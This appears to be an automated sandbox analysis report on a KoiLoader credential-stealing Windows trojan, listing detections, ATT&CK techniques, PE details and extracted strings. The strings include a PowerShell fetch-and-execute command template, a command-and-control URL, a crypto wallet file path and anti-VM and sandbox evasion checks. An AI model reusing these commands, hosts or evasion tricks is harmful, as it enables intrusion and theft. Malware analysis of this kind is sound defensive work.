Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|ri9ux5TIStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://79.124.78.173/incongruousness.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.wilkinsonbeane.com/css/slider/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Binary or memory string: VMWare
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	API call chain: ExitProcess graph end node			graph_0-13111
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	API call chain: ExitProcess graph end node			graph_0-11663

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00D1788B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00D1788B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00D11300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00D11300

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D11710 mov edx, dword ptr fs:[00000030h]	0_2_00D11710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD7920 mov eax, dword ptr fs:[00000030h]	0_2_00BD7920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD5FD0 mov eax, dword ptr fs:[00000030h]	0_2_00BD5FD0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00D1B939 GetProcessHeap,

0_2_00D1B939

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D1788B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D1788B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D15079 SetUnhandledExceptionFilter,	0_2_00D15079
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D14A20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00D14A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D14EEC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D14EEC

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD5C70 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_00BD5C70

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe	0_2_00BD94A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe	0_2_00BD94A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe	0_2_00BD94A0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00D14DD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D14DD3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,

0_2_00BD89F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	2 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	81%	Virustotal		Browse
SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	81%	ReversingLabs	Win32.Trojan.Koiloader
SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	100%	Avira	HEUR/AGEN.1317648

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://79.124.78.173/incongruousness.php%temp%	0%	Avira URL Cloud	safe
https://www.wilkinsonbeane.com/css/slider	0%	Avira URL Cloud	safe
https://www.wilkinsonbeane.com/css/slider/c	0%	Avira URL Cloud	safe
http://79.124.78.173/incongruousness.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://79.124.78.173/incongruousness.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://79.124.78.173/incongruousness.php%temp%	SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wilkinsonbeane.com/css/slider/c	SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wilkinsonbeane.com/css/slider	SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1674076
Start date and time:	2025-04-25 13:31:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
Detection:	MAL
Classification:	mal100.bank.troj.expl.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 5 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.29.183.29, 4.245.163.56
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.075796948750724
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
File size:	236'544 bytes
MD5:	1452d6a3ec8d69b0b331bc751e9c117b
SHA1:	9bf39e1ff35659600fc2220e322f0319f5d8add0
SHA256:	eed8806090ae11e888fceb18bb633068a6cab9aeac590c10fb2d4b74e0251d84
SHA512:	85f5506368d74a64e852e45380c15c3bc95b6cbefa5b86f3225919d8f87aea2f40e4883a25c8d52190b9d715ae2bec7d247c4fc72f2349293376be455dd4c145
SSDEEP:	3072:BNwCrquaP24/h7Q22oWvjWn+V4t4jrv34CovCWcKqp0re5OkOYg7SCv:/UhAoAZoLiVCv
TLSH:	88346C22F4C5B579E4B51977A4D9A5B0497EF8E01FB10DFB2B80848E5B71380FA21C6B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.R2).<a).<a).<ab.?`#.<ab.9`..<ab.8`=.<a9.?`=.<a9.8`;.<a9.9`..<ab.=`..<a).=aC.<aa/5`(.<aa/.a(.<a)..a(.<aa/>`(.<aRich).<a.......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x404a16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C9815B [Thu Mar 6 11:04:59 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	66deda4204cb009d8c01c3f28c17567f

Entrypoint Preview

Instruction
call 00007F5831430CDAh
jmp 00007F583143074Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041305Ch]
push dword ptr [ebp+08h]
call dword ptr [00413058h]
push C0000409h
call dword ptr [0041300Ch]
push eax
call dword ptr [00413014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00413060h]
test eax, eax
je 00007F58314308D7h
push 00000002h
pop ecx
int 29h
mov dword ptr [0041BAB8h], eax
mov dword ptr [0041BAB4h], ecx
mov dword ptr [0041BAB0h], edx
mov dword ptr [0041BAACh], ebx
mov dword ptr [0041BAA8h], esi
mov dword ptr [0041BAA4h], edi
mov word ptr [0041BAD0h], ss
mov word ptr [0041BAC4h], cs
mov word ptr [0041BAA0h], ds
mov word ptr [0041BA9Ch], es
mov word ptr [0041BA98h], fs
mov word ptr [0041BA94h], gs
pushfd
pop dword ptr [0041BAC8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041BABCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041BAC0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041BACCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0041BA08h], 00010001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19bf0	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x1f01c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3d000	0x127c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x18ac0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18a00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x112c8	0x11400	3c2aa453543c4a443a949d15635092de	False	0.5523947010869565	data	6.5422041328996485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x726c	0x7400	46983291b6421caf11d351609177be80	False	0.4400929418103448	data	4.880208312863345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x168c	0xa00	89343dc16e62571e7f8f0b7e2ee14a40	False	0.17890625	data	2.406474249960304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1d000	0x1f01c	0x1f200	9006dfa3fd338004d5d1ecd1316053cc	False	0.3493975903614458	data	3.52329835223916	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3d000	0x127c	0x1400	507998f550e177d84b0a944183cbd2df	False	0.7203125	data	6.333702787735152	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1d118	0x168	data	English	United States	0.6333333333333333
RT_RCDATA	0x1d280	0x1a	data	English	United States	1.3461538461538463
RT_RCDATA	0x1d29c	0x1ec00	data	English	United States	0.34814850101626016
RT_MANIFEST	0x3be9c	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer

GDI32.dll

LPtoDP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

• SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Click to jump to process

Memory Usage

• SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	07:32:15
Start date:	25/04/2025
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe"
Imagebase:	0xd10000
File size:	236'544 bytes
MD5 hash:	1452D6A3EC8D69B0B331BC751E9C117B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	17.9%
Signature Coverage:	16.5%
Total number of Nodes:	1381
Total number of Limit Nodes:	9

Executed Functions

Function 00BD89F0 Relevance: 210.7, APIs: 77, Strings: 43, Instructions: 654
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00BD8A2E
StrStrIW.KERNELBASE(?,Hyper-V), ref: 00BD8A4D
StrStrIW.SHLWAPI(?,VMWare), ref: 00BD8A63
StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00BD8A79
StrStrIW.SHLWAPI(?,Red Hat), ref: 00BD8A8F
EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00BD8AA4
GetModuleHandleA.KERNEL32(kernel32), ref: 00BD8AAF
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD8AC3
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD8ACD
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00BD8AF9
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00BD8B0C
GetFileAttributesW.KERNELBASE(?), ref: 00BD8B1B
GetFileAttributesW.KERNEL32(?), ref: 00BD8B2D

Strings

Wow64RevertWow64FsRedirection, xrefs: 00BD8AC5
d5.vc/g, xrefs: 00BD8FCF
PJones, xrefs: 00BD8F90
docx, xrefs: 00BD919F
new songs.txt, xrefs: 00BD8E02
%systemroot%\System32\VBoxService.exe, xrefs: 00BD8AF4
%systemroot%\System32\VBoxTray.exe, xrefs: 00BD8B07
kernel32, xrefs: 00BD8AAA
Files.docx, xrefs: 00BD8BC7
Resource.txt, xrefs: 00BD8C2A
Hyper-V, xrefs: 00BD8A40
sal.rosenburg, xrefs: 00BD8FA5
Wow64DisableWow64FsRedirection, xrefs: 00BD8ABD
BAIT, xrefs: 00BD8D83, 00BD8DA5
xls, xrefs: 00BD91AB
These.docx, xrefs: 00BD8BB9
powershell.exe, xrefs: 00BD921F
WILLCARTER-PC, xrefs: 00BD900E
%appdata%\Jaxx\Local Storage\wallet.dat, xrefs: 00BD8EF5
Harry Johnson, xrefs: 00BD8F97
Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo, xrefs: 00BD8EA5
Recently.docx, xrefs: 00BD8BA8
Opened.docx, xrefs: 00BD8BAF
WDAGUtilityAccount, xrefs: 00BD8F9E
Parallels Display Adapter, xrefs: 00BD8A6D
Red Hat, xrefs: 00BD8A83
Admin, xrefs: 00BD90BA
OpenVPN.txt, xrefs: 00BD8C39
Bruno, xrefs: 00BD8FE9
Paul Jones, xrefs: 00BD8F89
7, xrefs: 00BD8F29
doc, xrefs: 00BD9190
xlsx, xrefs: 00BD91B7
Are.docx, xrefs: 00BD8BC0
STRAZNJICA.GRUBUTT, xrefs: 00BD8F82
Joe Cage, xrefs: 00BD8F79
ANNA-PC, xrefs: 00BD9086
FORTI-PC, xrefs: 00BD9017
DESKTOP-ET51AJO, xrefs: 00BD8FFB
SFTOR-PC, xrefs: 00BD901E
Anna, xrefs: 00BD9074
@, xrefs: 00BD9047
VMWare, xrefs: 00BD8A57

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$@$ANNA-PC$Admin$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
API String ID: 4266617301-1597041734
Opcode ID: 94a154308ba907dc8ec8a6c41cfdf37490471045dc4ffdfd1e0a1bfae65a86f1
Instruction ID: fcd3d2f54668332e51646874815b6e57a59dc76c884b1819c48e1cb4720b553d
Opcode Fuzzy Hash: 94a154308ba907dc8ec8a6c41cfdf37490471045dc4ffdfd1e0a1bfae65a86f1
Instruction Fuzzy Hash: 0B327F71900219AADF209BA4CC89FEEF7ECEF14715F0505A7E518F3290FB749A458B64

Function 00D11300 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 301
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 00D1132A
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D11343
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00D11439
GetProcAddress.KERNEL32(00000000), ref: 00D11440
LoadLibraryA.KERNELBASE(?), ref: 00D11459

Strings

LoadLibraryA, xrefs: 00D1142F
kernel32, xrefs: 00D11325, 00D11434

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

